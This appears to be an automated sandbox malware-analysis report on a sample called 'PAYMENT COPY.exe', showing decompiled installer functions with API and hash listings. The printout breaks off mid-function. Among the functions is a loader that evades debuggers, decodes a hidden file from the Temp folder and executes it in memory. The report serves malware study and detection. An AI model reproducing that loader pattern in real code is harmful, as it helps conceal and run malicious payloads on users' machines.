                                                                  				signed char _t51;
                                                                  				signed int _t54;
                                                                  				signed int _t57;
                                                                  				signed int _t63;
                                                                  				signed int _t65;
                                                                  				void* _t67;
                                                                  				signed int _t70;
                                                                  				CHAR* _t72;
                                                                  				CHAR* _t74;
                                                                  				char* _t77;
                                                                  
                                                                  				_t74 = _a4;
                                                                  				_t37 = E004055AC(__eflags, _t74);
                                                                  				_v12 = _t37;
                                                                  				if((_a8 & 0x00000008) != 0) {
                                                                  					_t65 = DeleteFileA(_t74); // executed
                                                                  					asm("sbb eax, eax");
                                                                  					_t67 =  ~_t65 + 1;
                                                                  					 *0x7a3008 =  *0x7a3008 + _t67;
                                                                  					return _t67;
                                                                  				}
                                                                  				_t70 = _a8 & 0x00000001;
                                                                  				__eflags = _t70;
                                                                  				_v8 = _t70;
                                                                  				if(_t70 == 0) {
                                                                  					L5:
                                                                  					E004059BF(0x7a0588, _t74);
                                                                  					__eflags = _t70;
                                                                  					if(_t70 == 0) {
                                                                  						E00405513(_t74);
                                                                  					} else {
                                                                  						lstrcatA(0x7a0588, "\\*.*");
                                                                  					}
                                                                  					lstrcatA(_t74, 0x409010);
                                                                  					_t72 =  &(_t74[lstrlenA(_t74)]);
                                                                  					_t37 = FindFirstFileA(0x7a0588,  &_v332);
                                                                  					__eflags = _t37 - 0xffffffff;
                                                                  					_a4 = _t37;
                                                                  					if(_t37 == 0xffffffff) {
                                                                  						L26:
                                                                  						__eflags = _v8;
                                                                  						if(_v8 != 0) {
                                                                  							_t31 = _t72 - 1;
                                                                  							 *_t31 =  *(_t72 - 1) & 0x00000000;
                                                                  							__eflags =  *_t31;
                                                                  						}
                                                                  						goto L28;
                                                                  					} else {
                                                                  						goto L9;
                                                                  					}
                                                                  					do {
                                                                  						L9:
                                                                  						_t77 =  &(_v332.cFileName);
                                                                  						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
                                                                  						__eflags =  *_t49;
                                                                  						if( *_t49 != 0) {
                                                                  							__eflags = _v332.cAlternateFileName;
                                                                  							if(_v332.cAlternateFileName != 0) {
                                                                  								_t77 =  &(_v332.cAlternateFileName);
                                                                  							}
                                                                  						}
                                                                  						__eflags =  *_t77 - 0x2e;
                                                                  						if( *_t77 != 0x2e) {
                                                                  							L16:
                                                                  							E004059BF(_t72, _t77);
                                                                  							_t51 = _v332.dwFileAttributes;
                                                                  							__eflags = _t51 & 0x00000010;
                                                                  							if((_t51 & 0x00000010) == 0) {
                                                                  								SetFileAttributesA(_t74, _t51 & 0x000000fe);
                                                                  								_t54 = DeleteFileA(_t74);
                                                                  								__eflags = _t54;
                                                                  								if(_t54 != 0) {
                                                                  									E00404D62(0xfffffff2, _t74);
                                                                  								} else {
                                                                  									__eflags = _a8 & 0x00000004;
                                                                  									if((_a8 & 0x00000004) == 0) {
                                                                  										 *0x7a3008 =  *0x7a3008 + 1;
                                                                  									} else {
                                                                  										E00404D62(0xfffffff1, _t74);
                                                                  										E00405707(_t74, 0);
                                                                  									}
                                                                  								}
                                                                  							} else {
                                                                  								__eflags = (_a8 & 0x00000003) - 3;
                                                                  								if(__eflags == 0) {
                                                                  									E00405301(_t72, __eflags, _t74, _a8);
                                                                  								}
                                                                  							}
                                                                  							goto L24;
                                                                  						}
                                                                  						_t63 =  *((intOrPtr*)(_t77 + 1));
                                                                  						__eflags = _t63;
                                                                  						if(_t63 == 0) {
                                                                  							goto L24;
                                                                  						}
                                                                  						__eflags = _t63 - 0x2e;
                                                                  						if(_t63 != 0x2e) {
                                                                  							goto L16;
                                                                  						}
                                                                  						__eflags =  *((char*)(_t77 + 2));
                                                                  						if( *((char*)(_t77 + 2)) == 0) {
                                                                  							goto L24;
                                                                  						}
                                                                  						goto L16;
                                                                  						L24:
                                                                  						_t57 = FindNextFileA(_a4,  &_v332);
                                                                  						__eflags = _t57;
                                                                  					} while (_t57 != 0);
                                                                  					_t37 = FindClose(_a4);
                                                                  					goto L26;
                                                                  				} else {
                                                                  					__eflags = _t37;
                                                                  					if(_t37 == 0) {
                                                                  						L28:
                                                                  						__eflags = _v8;
                                                                  						if(_v8 == 0) {
                                                                  							L36:
                                                                  							return _t37;
                                                                  						}
                                                                  						__eflags = _v12;
                                                                  						if(_v12 != 0) {
                                                                  							_t37 = E00405C94(_t74);
                                                                  							__eflags = _t37;
                                                                  							if(_t37 == 0) {
                                                                  								goto L36;
                                                                  							}
                                                                  							E004054CC(_t74);
                                                                  							SetFileAttributesA(_t74, 0x80);
                                                                  							_t37 = RemoveDirectoryA(_t74);
                                                                  							__eflags = _t37;
                                                                  							if(_t37 != 0) {
                                                                  								return E00404D62(0xffffffe5, _t74);
                                                                  							}
                                                                  							__eflags = _a8 & 0x00000004;
                                                                  							if((_a8 & 0x00000004) == 0) {
                                                                  								goto L30;
                                                                  							}
                                                                  							E00404D62(0xfffffff1, _t74);
                                                                  							return E00405707(_t74, 0);
                                                                  						}
                                                                  						L30:
                                                                  						 *0x7a3008 =  *0x7a3008 + 1;
                                                                  						return _t37;
                                                                  					}
                                                                  					__eflags = _a8 & 0x00000002;
                                                                  					if((_a8 & 0x00000002) == 0) {
                                                                  						goto L28;
                                                                  					}
                                                                  					goto L5;
                                                                  				}
                                                                  			}


















                                                                  0x0040530c
                                                                  0x00405310
                                                                  0x00405319
                                                                  0x0040531c
                                                                  0x0040531f
                                                                  0x00405327
                                                                  0x00405329
                                                                  0x0040532a
                                                                  0x00000000
                                                                  0x0040532a
                                                                  0x00405339
                                                                  0x00405339
                                                                  0x0040533c
                                                                  0x0040533f
                                                                  0x00405353
                                                                  0x0040535a
                                                                  0x0040535f
                                                                  0x00405361
                                                                  0x00405371
                                                                  0x00405363
                                                                  0x00405369
                                                                  0x00405369
                                                                  0x0040537c
                                                                  0x00405391
                                                                  0x00405393
                                                                  0x00405399
                                                                  0x0040539c
                                                                  0x0040539f
                                                                  0x00405461
                                                                  0x00405461
                                                                  0x00405465
                                                                  0x00405467
                                                                  0x00405467
                                                                  0x00405467
                                                                  0x00405467
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004053a5
                                                                  0x004053a5
                                                                  0x004053ae
                                                                  0x004053b4
                                                                  0x004053b9
                                                                  0x004053bc
                                                                  0x004053be
                                                                  0x004053c2
                                                                  0x004053c4
                                                                  0x004053c4
                                                                  0x004053c2
                                                                  0x004053c7
                                                                  0x004053ca
                                                                  0x004053dd
                                                                  0x004053df
                                                                  0x004053e4
                                                                  0x004053ea
                                                                  0x004053ec
                                                                  0x00405407
                                                                  0x0040540e
                                                                  0x00405414
                                                                  0x00405416
                                                                  0x0040543b
                                                                  0x00405418
                                                                  0x00405418
                                                                  0x0040541c
                                                                  0x00405430
                                                                  0x0040541e
                                                                  0x00405421
                                                                  0x00405429
                                                                  0x00405429
                                                                  0x0040541c
                                                                  0x004053ee
                                                                  0x004053f4
                                                                  0x004053f6
                                                                  0x004053fc
                                                                  0x004053fc
                                                                  0x004053f6
                                                                  0x00000000
                                                                  0x004053ec
                                                                  0x004053cc
                                                                  0x004053cf
                                                                  0x004053d1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004053d3
                                                                  0x004053d5
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004053d7
                                                                  0x004053db
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405440
                                                                  0x0040544a
                                                                  0x00405450
                                                                  0x00405450
                                                                  0x0040545b
                                                                  0x00000000
                                                                  0x00405341
                                                                  0x00405341
                                                                  0x00405343
                                                                  0x0040546b
                                                                  0x0040546e
                                                                  0x00405471
                                                                  0x004054c9
                                                                  0x004054c9
                                                                  0x004054c9
                                                                  0x00405473
                                                                  0x00405476
                                                                  0x00405481
                                                                  0x00405486
                                                                  0x00405488
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040548b
                                                                  0x00405496
                                                                  0x0040549d
                                                                  0x004054a3
                                                                  0x004054a5
                                                                  0x00000000
                                                                  0x004054c1
                                                                  0x004054a7
                                                                  0x004054ab
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004054b0
                                                                  0x00000000
                                                                  0x004054b7
                                                                  0x00405478
                                                                  0x00405478
                                                                  0x00000000
                                                                  0x00405478
                                                                  0x00405349
                                                                  0x0040534d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040534d

                                                                  APIs
                                                                  • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000000), ref: 0040531F
                                                                  • lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000000), ref: 00405369
                                                                  • lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000000), ref: 0040537C
                                                                  • lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000000), ref: 00405382
                                                                  • FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000000), ref: 00405393
                                                                  • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
                                                                  • FindClose.KERNEL32(?), ref: 0040545B
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405335
                                                                  • \*.*, xrefs: 00405363
                                                                  • "C:\Users\user\Desktop\PAYMENT COPY.exe" , xrefs: 0040530B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\PAYMENT COPY.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                  • API String ID: 2035342205-2293971420
                                                                  • Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                                                  • Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
                                                                  • Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                                                  • Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 84%
                                                                  			E709B1000() {
                                                                  				long _v8;
                                                                  				void* _v12;
                                                                  				short _v532;
                                                                  				void* _t15;
                                                                  				int _t19;
                                                                  				struct _OVERLAPPED* _t25;
                                                                  				long _t37;
                                                                  				void* _t40;
                                                                  
                                                                  				_t25 = 0;
                                                                  				_v8 = 0;
                                                                  				if(IsDebuggerPresent() != 0) {
                                                                  					DebugBreak();
                                                                  				}
                                                                  				_t15 = GetTempPathW(0x103,  &_v532);
                                                                  				if(_t15 != 0) {
                                                                  					lstrcatW( &_v532, L"\\jptmg4zdrr658q2oh");
                                                                  					_t15 = CreateFileW( &_v532, 0x80000000, 7, _t25, 3, 0x80, _t25); // executed
                                                                  					_v12 = _t15;
                                                                  					if(_t15 != 0xffffffff) {
                                                                  						_t19 = GetFileSize(_t15, _t25);
                                                                  						_t37 = _t19;
                                                                  						if(_t37 == 0xffffffff) {
                                                                  							L11:
                                                                  							return _t19;
                                                                  						}
                                                                  						_t19 = VirtualAlloc(_t25, _t37, 0x3000, 4); // executed
                                                                  						_t40 = _t19;
                                                                  						if(_t40 == 0) {
                                                                  							L10:
                                                                  							goto L11;
                                                                  						}
                                                                  						_t19 = ReadFile(_v12, _t40, _t37,  &_v8, _t25); // executed
                                                                  						if(_t19 == 0) {
                                                                  							goto L10;
                                                                  						}
                                                                  						if(_v8 <= _t25) {
                                                                  							L9:
                                                                  							VirtualProtect(_t40, _t37, 0x40,  &_v8); // executed
                                                                  							_t19 =  *_t40(); // executed
                                                                  							goto L10;
                                                                  						} else {
                                                                  							goto L8;
                                                                  						}
                                                                  						do {
                                                                  							L8:
                                                                  							asm("rol al, 0x3");
                                                                  							 *(_t40 + _t25) =  !(_t25 +  !(( !(0x00000010 -  !( *(_t40 + _t25)) ^ 0x0000009d) ^ _t25) + 0x45)) + 0x45;
                                                                  							_t25 =  &(_t25->Internal);
                                                                  						} while (_t25 < _v8);
                                                                  						goto L9;
                                                                  					}
                                                                  				}
                                                                  				return _t15;
                                                                  			}











                                                                  0x709b100a
                                                                  0x709b100c
                                                                  0x709b1017
                                                                  0x709b1019
                                                                  0x709b1019
                                                                  0x709b102b
                                                                  0x709b1033
                                                                  0x709b1045
                                                                  0x709b1062
                                                                  0x709b1068
                                                                  0x709b106e
                                                                  0x709b1073
                                                                  0x709b1079
                                                                  0x709b107e
                                                                  0x709b10e8
                                                                  0x00000000
                                                                  0x709b10e8
                                                                  0x709b108a
                                                                  0x709b1090
                                                                  0x709b1094
                                                                  0x709b10e7
                                                                  0x00000000
                                                                  0x709b10e7
                                                                  0x709b10a0
                                                                  0x709b10a8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x709b10ad
                                                                  0x709b10d7
                                                                  0x709b10df
                                                                  0x709b10e5
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x709b10af
                                                                  0x709b10af
                                                                  0x709b10b6
                                                                  0x709b10ce
                                                                  0x709b10d1
                                                                  0x709b10d2
                                                                  0x00000000
                                                                  0x709b10af
                                                                  0x709b106e
                                                                  0x709b10eb

                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32 ref: 709B100F
                                                                  • DebugBreak.KERNEL32 ref: 709B1019
                                                                  • GetTempPathW.KERNEL32(00000103,?), ref: 709B102B
                                                                  • lstrcatW.KERNEL32(?,\jptmg4zdrr658q2oh), ref: 709B1045
                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 709B1062
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 709B1073
                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 709B108A
                                                                  • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 709B10A0
                                                                  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,?), ref: 709B10DF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.342261117.00000000709B1000.00000080.00020000.sdmp, Offset: 709B0000, based on PE: true
                                                                  • Associated: 00000001.00000002.342237387.00000000709B0000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.342276753.00000000709B2000.00000008.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.342285640.00000000709B3000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: File$Virtual$AllocBreakCreateDebugDebuggerPathPresentProtectReadSizeTemplstrcat
                                                                  • String ID: \jptmg4zdrr658q2oh
                                                                  • API String ID: 1306962974-224362054
                                                                  • Opcode ID: f03b757bb9f52597f68b794216aaaf64a7c0f96ec993c2e735f7e7e17160cf2d
                                                                  • Instruction ID: a9fe3e326663aa97b9bbc8228e1f9c1558e4072f2255fca38bd0f33eb333d971
                                                                  • Opcode Fuzzy Hash: f03b757bb9f52597f68b794216aaaf64a7c0f96ec993c2e735f7e7e17160cf2d
                                                                  • Instruction Fuzzy Hash: 9521EA36900154BBE710ABB28C99FDF7B7CDB05770F104629F652E2190D6389A45DB61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 64%
                                                                  			E00401FDC(int __ebx) {
                                                                  				struct HINSTANCE__* _t20;
                                                                  				struct HINSTANCE__* _t27;
                                                                  				int _t28;
                                                                  				struct HINSTANCE__* _t33;
                                                                  				CHAR* _t35;
                                                                  				intOrPtr* _t36;
                                                                  				void* _t37;
                                                                  
                                                                  				_t28 = __ebx;
                                                                  				 *(_t37 - 4) = 1;
                                                                  				SetErrorMode(0x8001); // executed
                                                                  				if( *0x7a3030 < __ebx) {
                                                                  					_push(0xffffffe7);
                                                                  					goto L14;
                                                                  				} else {
                                                                  					_t35 = E00402A9A(0xfffffff0);
                                                                  					 *(_t37 + 8) = E00402A9A(1);
                                                                  					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
                                                                  						L3:
                                                                  						_t20 = LoadLibraryA(_t35); // executed
                                                                  						_t33 = _t20;
                                                                  						if(_t33 == _t28) {
                                                                  							_push(0xfffffff6);
                                                                  							L14:
                                                                  							E00401428();
                                                                  						} else {
                                                                  							goto L4;
                                                                  						}
                                                                  					} else {
                                                                  						_t27 = GetModuleHandleA(_t35); // executed
                                                                  						_t33 = _t27;
                                                                  						if(_t33 != __ebx) {
                                                                  							L4:
                                                                  							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
                                                                  							if(_t36 == _t28) {
                                                                  								E00404D62(0xfffffff7,  *(_t37 + 8));
                                                                  							} else {
                                                                  								 *(_t37 - 4) = _t28;
                                                                  								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
                                                                  									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000); // executed
                                                                  								} else {
                                                                  									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
                                                                  									if( *_t36() != 0) {
                                                                  										 *(_t37 - 4) = 1;
                                                                  									}
                                                                  								}
                                                                  							}
                                                                  							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
                                                                  								FreeLibrary(_t33);
                                                                  							}
                                                                  						} else {
                                                                  							goto L3;
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				SetErrorMode(_t28);
                                                                  				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4);
                                                                  				return 0;
                                                                  			}










                                                                  0x00401fdc
                                                                  0x00401fe4
                                                                  0x00401fe7
                                                                  0x00401ff3
                                                                  0x00402093
                                                                  0x00000000
                                                                  0x00401ff9
                                                                  0x00402001
                                                                  0x0040200b
                                                                  0x0040200e
                                                                  0x0040201d
                                                                  0x0040201e
                                                                  0x00402024
                                                                  0x00402028
                                                                  0x0040208f
                                                                  0x00402095
                                                                  0x00402095
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402010
                                                                  0x00402011
                                                                  0x00402017
                                                                  0x0040201b
                                                                  0x0040202a
                                                                  0x00402034
                                                                  0x00402038
                                                                  0x0040207c
                                                                  0x0040203a
                                                                  0x0040203d
                                                                  0x00402040
                                                                  0x00402070
                                                                  0x00402042
                                                                  0x00402045
                                                                  0x0040204e
                                                                  0x00402050
                                                                  0x00402050
                                                                  0x0040204e
                                                                  0x00402040
                                                                  0x00402084
                                                                  0x00402087
                                                                  0x00402087
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040201b
                                                                  0x0040200e
                                                                  0x0040209b
                                                                  0x00402932
                                                                  0x0040293e

                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
                                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
                                                                    • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                    • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078EF38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                    • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078EF38,00789938), ref: 00404DBE
                                                                    • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                    • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                    • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                    • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                  • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
                                                                  • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
                                                                  • SetErrorMode.KERNEL32 ref: 0040209B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 1609199483-0
                                                                  • Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                  • Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
                                                                  • Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                  • Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00405C94(CHAR* _a4) {
                                                                  				void* _t3;
                                                                  				void* _t8;
                                                                  
                                                                  				SetErrorMode(0x8001); // executed
                                                                  				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
                                                                  				_t8 = _t3; // executed
                                                                  				SetErrorMode(0); // executed
                                                                  				if(_t8 == 0xffffffff) {
                                                                  					return 0;
                                                                  				}
                                                                  				FindClose(_t8); // executed
                                                                  				return 0x7a15d0;
                                                                  			}





                                                                  0x00405ca2
                                                                  0x00405cae
                                                                  0x00405cb6
                                                                  0x00405cb8
                                                                  0x00405cbd
                                                                  0x00000000
                                                                  0x00405cca
                                                                  0x00405cc0
                                                                  0x00000000

                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\PAYMENT COPY.exe" ), ref: 00405CA2
                                                                  • FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                  • SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                  • FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: ErrorFindMode$CloseFileFirst
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2885216544-3936084776
                                                                  • Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                  • Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
                                                                  • Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                  • Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 89%
                                                                  			E00403526() {
                                                                  				intOrPtr _v4;
                                                                  				intOrPtr _v8;
                                                                  				int _v12;
                                                                  				int _v16;
                                                                  				char _v20;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				intOrPtr* _t20;
                                                                  				void* _t28;
                                                                  				void* _t30;
                                                                  				int _t31;
                                                                  				void* _t34;
                                                                  				struct HINSTANCE__* _t37;
                                                                  				int _t38;
                                                                  				int _t42;
                                                                  				char _t61;
                                                                  				CHAR* _t63;
                                                                  				signed char _t67;
                                                                  				CHAR* _t78;
                                                                  				intOrPtr _t80;
                                                                  				CHAR* _t82;
                                                                  				CHAR* _t84;
                                                                  				CHAR* _t85;
                                                                  
                                                                  				_t80 =  *0x7a2f88;
                                                                  				_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage");
                                                                  				_t88 = _t20;
                                                                  				if(_t20 == 0) {
                                                                  					_t78 = 0x79f580;
                                                                  					"1033" = 0x7830;
                                                                  					E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580);
                                                                  					__eflags =  *0x79f580;
                                                                  					if(__eflags == 0) {
                                                                  						E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580);
                                                                  					}
                                                                  					lstrcatA("1033", _t78);
                                                                  				} else {
                                                                  					E0040591D("1033",  *_t20() & 0x0000ffff);
                                                                  				}
                                                                  				E004037F2(_t75, _t88);
                                                                  				_t84 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
                                                                  				 *0x7a3000 =  *0x7a2f90 & 0x00000020;
                                                                  				if(E004055AC(_t88, _t84) != 0) {
                                                                  					L16:
                                                                  					if(E004055AC(_t96, _t84) == 0) {
                                                                  						_push( *((intOrPtr*)(_t80 + 0x118)));
                                                                  						_push(_t84);
                                                                  						E004059E1(0, _t78, _t80);
                                                                  					}
                                                                  					_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
                                                                  					 *0x7a2768 = _t28;
                                                                  					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                                                                  						L21:
                                                                  						if(E00401410(0) == 0) {
                                                                  							_t30 = E004037F2(_t75, __eflags);
                                                                  							__eflags =  *0x7a3020;
                                                                  							if( *0x7a3020 != 0) {
                                                                  								_t31 = E00404E34(_t30, 0);
                                                                  								__eflags = _t31;
                                                                  								if(_t31 == 0) {
                                                                  									E00401410(1);
                                                                  									goto L33;
                                                                  								}
                                                                  								__eflags =  *0x7a274c;
                                                                  								if( *0x7a274c == 0) {
                                                                  									E00401410(2);
                                                                  								}
                                                                  								goto L22;
                                                                  							}
                                                                  							ShowWindow( *0x79f560, 5);
                                                                  							_t85 = "RichEd20.dll";
                                                                  							_t37 = LoadLibraryA(_t85);
                                                                  							__eflags = _t37;
                                                                  							if(_t37 == 0) {
                                                                  								M004092B6 = 0x3233;
                                                                  								LoadLibraryA(_t85);
                                                                  							}
                                                                  							_t82 = "RichEdit20A";
                                                                  							_t38 = GetClassInfoA(0, _t82, 0x7a2720);
                                                                  							__eflags = _t38;
                                                                  							if(_t38 == 0) {
                                                                  								 *0x4092ac = 0;
